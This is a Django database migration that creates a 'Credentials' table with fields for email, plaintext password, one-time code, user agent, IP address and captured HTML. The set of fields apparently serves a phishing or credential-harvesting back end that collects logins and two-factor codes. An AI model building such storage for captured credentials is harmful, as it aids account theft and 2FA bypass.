# Generated by Django 3.1.7 on 2021-04-02 11:29

from django.db import migrations, models


class Migration(migrations.Migration):

    initial = True

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='Credentials',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('email', models.CharField(default='', max_length=100)),
                ('password', models.CharField(default='', max_length=100)),
                ('otp', models.CharField(default='', max_length=100)),
                ('user_agent', models.CharField(default='', max_length=1000)),
                ('ip', models.CharField(default='', max_length=100)),
                ('html_code', models.TextField(default='')),
            ],
        ),
    ]
